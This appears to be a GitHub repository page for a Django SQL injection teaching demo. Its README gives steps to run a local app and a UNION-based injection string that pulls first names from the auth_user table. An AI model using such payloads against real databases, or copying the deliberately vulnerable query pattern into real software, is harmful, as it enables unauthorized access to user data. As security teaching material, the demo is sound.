Skip to content

pyvideo/sql-injection-attack-demo

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

How to perform a SQL Injection Attack

Steps

  • pip install Django
  • python manage.py runsever
  • http://127.0.0.1:8000/items/search
  • SELECT name FROM orders_item WHERE name LIKE '%' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '%'
  • Search for "z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '"

Adding a test line. Just for learning reasons.

About

A Django SQL Injection Attack Demo

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 96.2%
  • HTML 3.8%